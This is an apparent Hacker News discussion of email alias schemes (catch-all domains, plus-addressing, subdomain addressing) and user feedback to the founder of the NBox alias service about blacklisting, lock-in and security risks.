I've had a catch-all for *@mydomain.com forward to my primary email address for 10+ years. In that time I signed up for services and websites with [domain]@mydomain.com thinking I'd catch all those dirty scoundrels selling my email address and have an easy way to filter unwanted mail.
But you know what really happened? I wound up with hard to remember email logins and caught less than a handful of services sharing my email address without my permission.
I did that, too. Used a catch-all and just subbed to things with a new e-mail address, relying on the catch-all to put it all into one box.
Big mistake.
First off, I got FLOODED with e-mail bounce-back spam because spammers send e-mail with forged From: headers and I'd get all the errors.
Second, I discovered that nobody is actually selling my e-mail address except for one gaming forum I used years ago. Not even Facebook has sold my e-mail address.
Third, I've run into issues when replying to e-mails. I filed a support ticket with a company once, where the e-mail address I had registered with them was company@mydommain.com. They responded via e-mail, and when I replied to said e-mail, their ticket system rejected it since the From: address was my main address of myname@mydomain.com.
Now that I want to just switch to a single e-mail account with gmail, I find myself needing to try to find every e-mail address I've used @mydomain.com and changing them with the website. Meh...not worth it.
Won't FB be among those least likely to sell your email address? FB has tons of ways to make money using your data. Your email address offers very low marginal utility over all the rest of your data.
You could have solved the second problem by storing the email with the login and password in a password manager. Maybe they were not a thing yet when you started this experiment.
The third problem is more serious. I use Thunderbird. I googled and there are a couple of addons that makes it easy to edit the from address without having to create new Thunderbird identities.
Yeah, I started this back in 2003. I imagine password managers existed back then, but they certainly weren't as common.
These days I don't even use Thunderbird. I just have gmail retrieve all my e-mail from my POP3 server. Though FWIW, I still have Thunderbird installed with all my e-mail going back to 2003. I imagine there's a way I could capture every e-mail address I've used then manually go to each web site and change my registered e-mail address.
This is exactly what I do, and it's worked beautifully for me. (domainname)@mydomain.com is pretty standard/easy, and storing it in password manager makes it even easier.
Same here. Sometimes I'll also add the date when I entered the address in a form. For instance, the last time I registered to vote, I used YYYYMMDD-ca-voter-registration@mydomain.org. During the last election cycle, I caught a few California politicians harvesting my address and adding it to their email lists.
Ironically the CAN-SPAM Act only prevents commercial entities from doing this, however shady the practice may be. Political emails are protected free speech and AFAIK the means by which addresses are obtained is irrelevant.
Not the poster you replied to, but I use Fastmail.
If your Fastmail address is dfinniger@fastmail.com then you can randomly create emails like:
some-domain@dfinniger.fastmail.com
and it will automatically send them to your main email.
It's very convenient, and the cost per year is likely to be less than your hourly rate multiplied by the number of hours it'd take to set up self-hosting.
I use G Suite for one domain (because I was grandfathered into a free plan) and Zoho for others. IMAP is a little faster in Zoho, and I haven't seen a difference in reliability. The Google web interface is much better, though.
Companies/organisations whose data leaks I have discovered through spam to single-use addresses:
* monster.com
* linkedin
* Pragmatic Programmers (pragprog.com)
* audioscrobbler (now part of last.fm)
* The London Cycling Campaign
* The Economist's subscription department
You need to discern between companies nefariously sharing your email without your permission and those that were the victim of hacks. Dropbox and Adobe were, of course, both thoroughly penetrated and the exfiltrated logins including email addresses are widely available.
These aren't small numbers, either. We're talking about 68 million logins for Dropbox and 150 million for Adobe. To put those huge numbers in perspective, combined that's over half the population of the USA.
"But you know what really happened? I wound up with hard to remember email logins and caught less than a handful of services sharing my email address without my permission."
Can you elaborate ? I have been meaning to set up just such a mechanism as it has always seemed like a good idea ...
It seems like "rsync.net@example.com" would be very easy to remember and associate with the site (rsync.net, in this example) ...
I've been using the same system with my own domain for several years now, and unlike the OP, I've seen many unique emails get on to spammer lists. My blocklist of emails has got quite long!
As you say, using a password manager, or just picking a nameOfService@example.com style of email, means remembering the email addresses is pretty easy. n.b. you may need to also set up your email client to let you send emails with a customisable address too.
Spammers who send stuff to randomAddressTheyMadeUp@example.com can be mostly blocked because these tend to have a messy jumble of text and numbers - I use a simple regex to throw away these kind of spams. I use procmail to do the blocking, but I'm sure there are many other tools that would work just as well.
I toyed with the idea of using a catch-all, but couldn't get around the problem of having to occasionally send mails from the address (e.g. for customer support, etc - as another commenter mentioned).
Recently I came up with another solution that I know some have used:
Stick to one email address and have a whitelist. Anything not in the whitelist is "spam" (including irritating LinkedIn emails, etc). If I get email from anyone not in the whitelist, they get sent an email with a website link asking them to confirm their identity by submitting their email address. Once they do that, they are whitelisted and all their quarantined emails show up in my inbox.
The only remaining part is constructing that whitelist. I wrote a script to go extract all the From addresses and just dumped them in there. So people who've emailed me in the past will not deal with going to the website to confirm their identity.
If I get email from an entity I no longer want to see in my inbox, I press a keystroke to remove them from the whitelist. Likewise, if I go to my quarantine folder and see an email I'd like to whitelist, it's done with a keystroke.
Been using it for less than a month, and it is quite effective so far.
> I toyed with the idea of using a catch-all, but couldn't get around the problem of having to occasionally send mails from the address (e.g. for customer support, etc - as another commenter mentioned).
You know, the sender header is just a text string... What stops you from putting whatever e-mail alias you registered with as sender, for those occasions?
>What stops you from putting whatever e-mail alias you registered with as sender, for those occasions?
Cognitive load. I don't want to:
1. Think about it.
2. Figure out which email address goes with which To: field.
3. Find a way to automate all this.
In the end, my solution would be less work to get rid of unwanted emails than using a catch-all. Why should I do the extra work in maintaining the system, when the sender can do the tiny amount of extra work instead? More fundamentally, why should anyone feel they have the right to just insert anything into my inbox? I should control the inbox - not them.
I too have had a catch-all @mydomain for around 10 years and it works beautifully for me. In addition to @mydomain I also have 2 email addresses. My main email that I give directly to places I trust like my bank and the second one I direct all my @mydomain email to. This way I only have to remember 2 email addresses, no matter how many @mydomain email addresses I have created (many hundreds by now).
By default I only ever receive a limited number of emails from any new emailx@mydomain, unless I explicitly go to @mydomain and allow a specific emailx@mydomain to pass that limit.
My only irritation is that some vendors block @mydomain as a valid email address, in which case I use an ancient email address in its place. Needless to say that vendor will never see my main email.
On the other hand, having a unique address for each site means they can't readily correlate your identity when selling information about users. (They're not gonna special-case your catch-all.)
Just make sure your catchall is renewed well into the next five years. Heck, you can do a 'rollover renewal' that lasts 10 years if you wanted.
This is to stop somebody eventually gaining control of the domain when it expires, setting up a catchall on it, and then being able to login to every single account you used with that address.
Some registrars protect a domain after expiration so nobody can hijack it and claim it as their own, but you often have to pay extra for this service.
It was worth it until large hack attacks which stole database of one of the mailing list company (forgot name) -- then spam started pouring on many-many legitimate addresses...
Only downside, is when company merges or renames: if it merged I end up with to accounts which have half of the history; if it renames -- hard to remember original email (recent example wayfair's old name was something else).
Now, I'm switching to single email -- it's just simpler
I do not use catch-all addresses, but use a version of [domain]@mydomain.com buy adding new email addresses (aliases) in an automated way. I "remember" the used email addresses in two ways: 1) my mail server configuration contains a list of all aliases created in the past, 2) my password manager saves logins on top of that. The nice side effect is, that you keep track of all the sites you have ever created logins at.
Fastmail has an elegant solution for this called subdomain addressing. For example, let's say your email address is joe@fastmail.com. You can use amazon@joe.fastmail.com or facebook@joe.fastmail.com, spotify@joe.fastmail.com, etc...
It's also a nightmare if/when you sell your domain, because you have to go clean up all those accounts. You can get one email forwarded by the new owner, but N is a no-go.
That depends on your definition of "solution". The scheme protects you (to a certain degree) from automated creation of inter-site profiles. The reason is, only very few people employ (a variant of) this strategy, so trying to "deanonymize" is costly and usually not worth it economically.
with gmail you can do something similar without all that hassle. lets say your email is johndoe@gmail.com you can register any email as johndoe+whatever@gmail.com and Gmail will always ignore the + and route to your johndoe@gmail.com address.
The mail has to get to you somehow. The way SMTP works is that there are two places your email address is usually used during email delivery:
1. Before the actual sending of the mail data, the sending server connects to your mail server and after a polite introduction sends 'RCPT TO: xxxx@yyyy.com'. This is where your unique-for-that-site email address is used.
2. Later on during the transmission, all the 'real' mail headers are sent, and this is where the To, From, Subject, and CC headers are set. If you were BCC'd there is no 'BCC' header, so the 'To' header normally has the mail address of the original 'To' recipient. Or in a lot of cases the 'To' header is omitted entirely. Depending on your mail client, you will either see your name in the To field, or something like 'Undisclosed Recipients'.
Spammers typically shake it all up, so that the 'To' header rarely matches the 'RCPT TO:' value.
In my bespoke anti-spam system, I re-inject the 'RCPT TO:' and 'MAIL FROM:' into the mail headers (prefixed with X-) so i can easily see in my client what is actually going on.
Well obviously it's automated. I didn't mean manually finding name+domain@mydomain.com e-mail addresses and manually editing them to just name@mydomain.com.
I think this is a good idea, but pretty poorly executed again.
Another user commented that you could just register your own domain and do this; that's great for the average hacker news reader, but not so great for the average Joe so a service like this (if done correctly) would be pretty convenient.
Things that jump out right away as bad about this NBox.
1) It just auto generates an email for me. That's going to be a pain in the ass to remember.
2) Wait; how do I login? I literally don't understand how to login to this app short of going to the site and I get auto logged in by the Chrome extension?
3) Why do I even need a Chrome extension to get my email; where is the password protection so I can login from a different device or god forbid my computer crashes?
4) Not every service asking for an email address is a web service. If I sit down for dinner at an Applebees and order a meal a server is going to tell me the appetizer is free if I just provide my email address... and I want that free appetizer minus the side of spam...
As someone else noted mailhero.io is basically the same service as this, but it's big flaw is that the real email address is exposed since it's always included in the provided email address.
spam.u.later@mailhero.io (ah; real address is later@mailhero.io) Also; many other email services (including GMail can do the samething as mailhero using + addressing and adding rules.
Understood; and I'm not being a hater. I'm just trying to provide some useful feedback after checking out your service.
In regards to the extension though; that's just such a bad direction to go IMHO. Most email is being read on phones these days anyway; does NBox even work from a phone today?
No harm taken, the service is not perfect yet and it lacks a lot of functionalities, that we can agree on.
It works on android phones with chrome, but like you said I wouldn't remember the generated addresses, so we think the extension is a big part of the service, and unfortunately, extensions are not available on mobile. We're working on the subject to find the best solution possible.
The service is fine as-is. It sounds like a perfect complement for a password manager like LastPass or 1Password. All the points brought up are addressed by the password manager: sync across multiple devices, use multiple browsers, etc.
A password manager generates random data for the password textbox. Your extension generates random data for the email textbox. Perfect!
That's the thing, it doesn't need to. Nbox fills the email text box with something random, and LastPass or 1Password takes it from there. It generates a password for you and asks you to save the login info for future use.
I've been wanting something like this for awhile to combine with my LastPass use. Now I can have different email addresses and passwords for everything.
Agree with all your points except your last. Many websites and services will disallow email addresses with + in them (and they're normally he ones I don't trust, like insurance comparison ones)
If you are running your own mail server (the open web is not yet dead) you can change the `recipient_delimiter` to another character. Mine is setup with a period. misc.ycombinator@domain.com
This is definitely a pro-tip! Using a dot instead is a great idea and much less likely to be "auto-removed" by a smart harvester that strips "+" extensions.
I agree that is an issue with those services, but that was sort of my point. Some websites are starting to catch on that people are doing this so they are starting to block + addressing the same way they block mailinator.
Somewhere in this issue of websites blocking + addresses there is a some irony as + addressing is a more recent email standard and so some people have legitimate email addresses with + symbols in them; in fact last I knew Microsoft Exchange still wasn't supporting + addressing due to the need to support legacy users.
As an alternative, you could register a domain with a catch-all email address and simply register for new services on the fly using a unique string for each site. Have the catch-all forward to your main email account.
For example, I would sign-up for HN using hackernews@marak.com and for Reddit using reddit@marak.com
Been there done that. If you catch all e-mail you will also get a lot of spam to random addresses like say sven@marak.com, lollerskates95@marak.com and so on and so forth. So then you need spam filtering anyway, or you need to configure which addresses are valid.
I still host my own e-mail but I no longer do catch-all. There are only a few sites and services I care about. For those I have trusted them with my e-mail address. For all others I use 3rd-party throwaway mail services.
Or you can use hackernews.really@marak.com and reddit.really@marak.com and only forward *.really@marak.com.
I have learned to keep a personal e-mail address for friends & somewhat trusted people, but never businesses. Businesses (and all government offices, kids' school,...) get their one-time address. If spammers somehow get to it, it is much easier to cut them off, and I also know who leaked the address to them.
Of course, http://www.mailcatch.com/ rules for those one-time "no, I will not let you spam me" registrations.
I forward abuse@, security@, postmaster@, hostmaster@, webmaster@, info@ and dns-admin@ for my main domain, and actually mostly don't get any spam to any of them except from dns-admin@, which I have listed as contact in WHOIS for some of my domains.
what kind of accounts do you use throwaway mail services for? the use case where NBox would be useful for me is sites I don't use often, i.e. a clothing site or online video game store. but i wouldn't trust those to a throwaway email
I used to do this. The amount spam of mail I received to mailbox names I had never used started to dwarf my actual email. This is apparently made worse because spammers take the fact that these addresses will receive mail as a signal that they're valid, causing them to send more mail to them.
A couple of years ago, maintaining the blacklist passed the point where this was a viable technique for me.
If I configure me.example.com to accept emails matching the pattern "me<anything>mail42@me.example.com", then I can generate as many on-the-fly unique emails as I want, without maintaining any lists, and without catch-all forwarding of random spam to my inbox.
If I use me+anything@me.example.com, I get the same exact feature, but the downside is "+anything" is recognized by some and either disallowed or used to generate more patterns.
If I use subdomains (like anything@me.example.com) I have the spam issue.
With a white pattern scheme, you can choose your own pattern (so sites can't really catch on), not have to maintain any lists, and avoid spray-and-pray spam.
If you do this, make sure you lock down your account at your domain registrar. A socially engineered DNS hijack could be all it takes to obtain full read/write access to your email.
The other thing that happens is spammers use your domain to spam others. That catch-all will work for systems that test email validity for the spammer's made-up address on the From line.
With gmail you can just do username+hackernews@gmail.com and it will send it to username@gmail.com. The nice thing about this service though is you can just remove the fake email and they can't email you anymore.
I have also observed emails tagged with "+" to break unsubscribe links in cases where the address is included in the link and the link is not properly URL-encoded.
Gmail allows you to create unlimited unique addresses by using the + symbol. so you could do: username+trello@gmail.com. It's worked well for me for a few years.
The only downsides I see are that (very few) sites still complain about the perfectly legal + symbol and some sites / bots are probably starting to reverse engineer that since it still exposes your username. But so far, I've yet to have a single site or service expose my primary mail account, so it at least helps.
Finally: this is a fantastic hack for testing your own signup flows. :)
I have a personal Gmail account that I give to real life friends and real met-in-person humans who want to directly contact me. And then a web gmail where everything is labeled with a plus(if websites don't accept the plus, I use a series of periods in the first portion of the email to make it unique. Then, I forward all emails with whitelisted +whatever's from my web mail to my personal mail.
Not really, according to the spec the '+' can be interpreted as part of the email address. The approach gmail takes seems to have gained widespread adoption, but it's not mandated by the spec.
I believe it is Gmail specific. Cursory search reveals that sendmail does that too, but I don't think it is specified in RFC. Feel free to correct me if I'm wrong.
It's more Sendmail and Exim and others did it, and Gmail does it too - not the other way around;)
With qmail the "standard"[1] was username-alias@example.com, rather than username+alias@example.com. I rather prefer that - but then my (user)name(s) don't contain any hyphens.
Either way I think it looks better with system usernames - firstname.lastname@example.com was/is usually handled as a separate form of alias look-up anyway.
[ed: and I recall using tmda as an anti-spam system - it inserts an encrypted tag in the alias portion, that can be stamped with an expiry date, and tied to a sender address (eg hmac(userkey, sender@example.com+01012018) => xyxyzzzzz - give sender@example.com the address user-xyxyzzzz@example.net - and mail to that address will be accepted from only sender@example.com until 1/1/2018.
I don't have a source to a RFC, but all email's I've ever used let me do this. Including multiple different hosting services with my own domains, and my current work which is MS Exchange.
With a service aggregating these, we see many users from NBox. Perhaps this is not a concern for your use case, but it seems a tradeoff worth considering.
If I register some non-personally-identifiable domain "e.g.: bumblebutt.example" and use a WHOIS proxy, you're can only be given up by a registrar... which usually means a warrant.
Still paranoid? Pay for the domain using bitcoin you got in exchange for cash/services (there are a lot of registrars that take bitcoin).
Its certainly more traceable from the perspective of metadata aggregation. If you were looking at the users from multiple sites, you could easily consider "*@bumblebutt.example" to be one person thus linking all accounts together.
The benefit of a public site is that you can't use the hostname as an identifer for a single person.
Yep. I do this and route my email through mailgun that allows me to setup rules for forwarding emails. Their free tier is pretty generous and works great for my needs. Also solves the problem of shoddy websites selling my email because I gave them an unique email address and can block all emails coming to that address easily, if needed.
I've been doing this for years. It's fascinating (and sometimes horrifying) which addresses end up on spam/scam lists. I used to inform companies when it happened, but they almost always go for plausible deniability with "spammers try random addresses at a domain sometimes, it must have been that".
Just a reminder that Adobe, LinkedIn and Dropbox have all been hacked/suffered data leaks - those aliases are the main source of my spam. The other is through mandatory public company registration in Norway that's consistently mined by some halfwits apparently selling stamps etc.
My hesitation in signing up for any of these unifying products is the potential lock in. If I start using your service and eventually have dozens of sites directed through you, what happens when the product disappears?
My question is therefore how do you plan to fund this indefinitely if it is "Just Free, Forever" and is unlimited? You say it is part of promoting your brand, but it looks like that brand (or at least the domain) has been around for less than a year, so not much history. If it isn't you company's main product, what is to stop you from deciding the costs of providing this becomes too expensive for the promotion it is giving you?
What's your plan when every site starts banning your addresses? I have to spend 15 minutes to find a new non-blacklisted temp-email service every time I want to use one.
Hi deft, that's a concern we have. Some services might block our addresses some day, but that would be a mistake because nBox is not a disposable email service.
> Why shouldn't a service flag you as malicious and refuse users with email from your domain?
Some services might block our addresses some day, but that would be a mistake because nBox is not a disposable email service.
> What do you do to prevent mass account creation on the service?
If your question is in regard to services which might block us, I don't think they care about mass account creation, a few email addresses are enough to bypass limits on emails.
As for my 2nd question it was related. Often time spammers rely on tools like nbox to create a massive amount of accounts on services like Winterest, so Winterest has to flag your domain as potentially malicious.
I was wondering if you have any countermeasures to this problem, such as a rate limit on the number of accounts one can create per service. I'm sure Winterest would appreciate :)
Yes exactly, fraudsters exploiting your service to have as many email as they need to create very many accounts on Winterest.
If you have 1 single email account per service that is fine.
I think you should call out these two aspects on your site, to show that you're increasing privacy for users, but also protecting services from being abused exploiting nbox. It should reduce the likelihood to be blacklisted.
So how is this different from something like Mailinator.com? In my opinion, I can't see a use case in which I'd care enough to have my temporary email private. If I cared enough I'd just use my real email.
If I had to guess, requiring that each email address be tied to an individual person would allow NBox to stay off "temporary email address" blacklists. It's a privacy service essentially, not an anonymity service. Same reason why credit card masking services are legal, but Visa/MC/etc wouldn't allow a mass-shared CC number.
It will not keep NBox off blacklists. I've been using sneakemail for this for like fifteen years (and they do not offer a free service), and I've run into a number of sites that ban their domains anyway. Adafruit, for example, bans their domains.
Gmail accounts sometimes require you to give a phone number in order to register a new account. Not to mention creating a new email address with this looks way easier than signing up for another Gmail account.
A link to the chrome extension on the landing page would be quite useful (Otherwise visitors need to go to the chrome web store and search for it...and some of them are too lazy to do it). But otherwise I really like the idea. I'll give it a try ;)
TL;DR - Most SMTP servers support delivering mail to addresses like foo+bar@email.com, in which case it will be received by foo@email.com. You can specify whatever string of alphanum chars you'd like after the plus sign.
I've hit enough sites that refuse to accept a + in email addresses that I gave up using it, on the basis that I couldn't remember whether or not I was using it, per site. Standard it may be, but so many sites have bad email address validation.
Sorry, couldn't resist. I got burned by this, I used it to sign up to a newsletter, and when I tried to unsubscribe, I kept putting in my actual email address with no results. Took me two weeks to think of checking the "to" field and realising I'd used a plus address
Normally I only read on HN, but you got me logging in, upvoting and commenting! Probably most people just don't know about the standard. (As it is probably with most standards).
How does it work? I mean how does it generate addresses that aren't blocked by the a services (like mailinator and similar throwaway email sites)? Does it use thousands of random domains?
Hi alkonaut, the domain is unique at the moment.
Some services might block our addresses some day, but that would be a mistake because nBox is not a disposable email service.
Most of these new email services overlook a few very important details which guarantee that they will probably not be around in a year:
1. You need to have multiple domains. If your solution is just one host name and your service becomes popular, it will become blacklisted in a matter of months.
2. The volume of spam you'll receive is huge. Really huge. Even if your service is only moderately successful. It costs money to keep such a service running.
Presumably if I don't want to receive spam emails I'm also unlikely to allow a website to send me notifications. I'm unlikely as well to install an extension for a very specific service I'm not going to use very often. Extensions are a privacy concern and consume memory needlessly.
If I'm willing to give a fake registration email I probably don't care about privacy and this is just for throwaway anyway. I'm not going to give any personal info to a website I don't trust with my email in the first place.
I also don't understand how this is not going to be blacklisted like any other anti-spam email service.
Maybe I'm not the target for this product bu this seems to bring nothing new in a slightly more annoying way.
> Extensions are a privacy concern and consume memory needlessly.
This is somewhat tangential to your points, but I see this type of comment a lot. Chrome extensions are just renamed zip files that contain all the JS, HTML, and CSS for their extensions. It is easy to take a look at the source code if you have any privacy doubts. The author might try to obfuscate the JS, but it should be trivial to see if there are outgoing connections being made. Google also makes it simple to disable extensions with a couple clicks if you want to keep particular extensions disabled except when you are actively using them.
I've been using 33mail.com for years for this. I just give it an address like "hackernews@username.33mail.com" and it forwards email. If hackernews ever starts spamming, 33mail gives me a link to block it.
I love that service, it's saved me countless headaches.
Blur by Abine offers a similar service, it includes a password manager and the ability to mask phone and card details on the premium version. Generated email addresses can be managed on the site or through the mobile app.
The FAQ says that it's not a disposeable-e-mail-generator, but the description of what it does makes it seem like that's exactly what it is. (Maybe it means that it doesn't generate random e-mail addresses from a shared pool?)
I've been a satisfied user of SpamGourmet (www.spamgourmet.com) for years, and the only (argueable) downside I've seen is how upset customer-service representatives get upset while reading my address. How does your service compare?
Hi JadeBN, you're right spamgourmet is very similar to nBox. Here are a few differences:
- With spamgourmet the addresses are designed to expire after X emails, so it's intended for services you don't care about.
- Once I know one spamgourmet address, I can try to guess other addresses of yours.
- We don't ask for your personal email. If spamgourmet gets hacked, spammers will get your information.
Thank you for the reply; I think that this is a useful description of the advantages of your service. Just for purposes of completely accurate comparison, though:
> - With spamgourmet the addresses are designed to expire after X emails, so it's intended for services you don't care about.
This is configureable; it can be turned off entirely (allowing a trusted sender to send an unlimited number of e-mails to an address), or the allowance can be 'refreshed' (so that, after, say, 5 e-mails sent to an address, you can allow 5 more as a further probation).
So a lot of systems these days use email password recovery, is this not just adding another attack vector ?.
> bdav24: Hi water42, don't ever trust anyone with your data, governments and big companies get hacked every day. Our angle: we don't ask for any personal information
You will be able to route/read all of an individuals inbound mail ?
Hi markwakeford, that's something we're currently working on.
All devices that access the account will have to be validated on the previous device(s) and will be displayed.
That said, for targetted attacks we won't be able to do better than Google and others, the risk is never 0.
> You will be able to route/read all of an individuals inbound mail ?
You mean to handle the load? We can scale at any time if we need to, but our current setup can already handle a lot.
I am trying to understand this. Appears to offer bulk accounts that are easy to create and permanent, targeting the market that sits between a) regular email addresses, which are permanent but a pain to sign up for, needing phone verification, etc. and b) throwaway accounts that are easy to create but cannot be kept long-term.
This seems like an interesting idea if they own a whole bunch of different domains, but they don't specify this, and my attempt to sign up for an address failed. (open firefox -> click create my nBox -> click Sign up for a service (i type https://facebook.com) -> receive message saying "To create your nBox
Allow the notifications" -> No simple info about how to do this is given, so I give up)
Hi iliketosleep, to allow the notifications a small window should appear at the top of the page. But not all browsers have implemented this feature.
What device and browser do you use?
I'm using the latest version of firefox on win7. Upon further investigation, I think I know what happened now. There's a tiny box at the left of the address bar that enables me to unblock notifications for the site. Which means I must have automatically pressed the "disallow" button before even reading anything (a reflex response!). If I was you, I'd have an option to see a screenshot showing how to unblock notifications. It's always the stupid little things that can make a very big difference.
This is a good idea but creating a new address for each site seems to be overcomplicating a simple problem. I just have "mynormalemailalias_spam@domain" which is used for sign ups, if I ever need to log into a site I've signed up with using that address it's easy to remember the login details and/or reset my password.
Hi synicalx, I used that method for many years too, but with time the emails end up piling up. That's manageable of course, but it feels nice to control exactly who owns your information.
This seems like it's almost "1Password for Email Addresses," which would be pretty great: go to site, hit key combination, have random/saved email inserted into login boxes. Combining that with email forwarding to my real email address that I can turn on and off is pretty powerful.
Ho sorry you're right, technically accepting webpushes is not required, but it's part of the tunnel for now. We're currently changing that, but it's not finished yet.
In my experience spamers use mostly email addreses publicly exposed (web sites, usenet, forums) and stolen address books (viruses, malware) - you can't do much about the second if that happens to your recipients.
Hi imhoguy, spammers also happen to buy leaked data sometimes to better target people. Anyway, spam is one thing we address, but that's not the main point. It's more about control of your privacy.
These days many services ask for a phone number for 2FA just to sign up, it'd be great to have a tool that gave you multiple numbers on demand so you don't have to give out your phone number.
I've been considering just buying a few prepaid SIM cards just for services like this. I'd love some throwaway phone number/ SMS-forwarding services, but most get blacklisted within a few months because spammers immediately jump all over them.
Hi dmitrygr, the idea is not new, but the link you gave is for disposable email addresses, which are public. That's a different use-case from nBox, where the addresses are private.
Yes, that gives you some privacy of course, but I still think it's a different use-case: with disposable email services, you're usually not notified when you receive an email, and checking all the addresses must be a pain. I'd use them for services I really don't care about and nBox for wanted and semi-wanted emails.
Yes, that is your intention, but when funding gets pulled, investors rarely like spending more money on letting things "unwind", they have not company or brand to protect, so consumers' concerns take a back seat to investors.
The other problem with this is that there is now a middle man in my security chain. If you get hacked, potentially all of my accounts can be hacked. If you have a rogue employee, same thing. If you have a flaw in your security, I too am at risk from a centralized source.
Hi water42, don't ever trust anyone with your data, governments and big companies get hacked every day.
Our angle: we don't ask for any personal information.
But you know what really happened? I wound up with hard to remember email logins and caught less than a handful of services sharing my email address without my permission.
It wasn't worth it.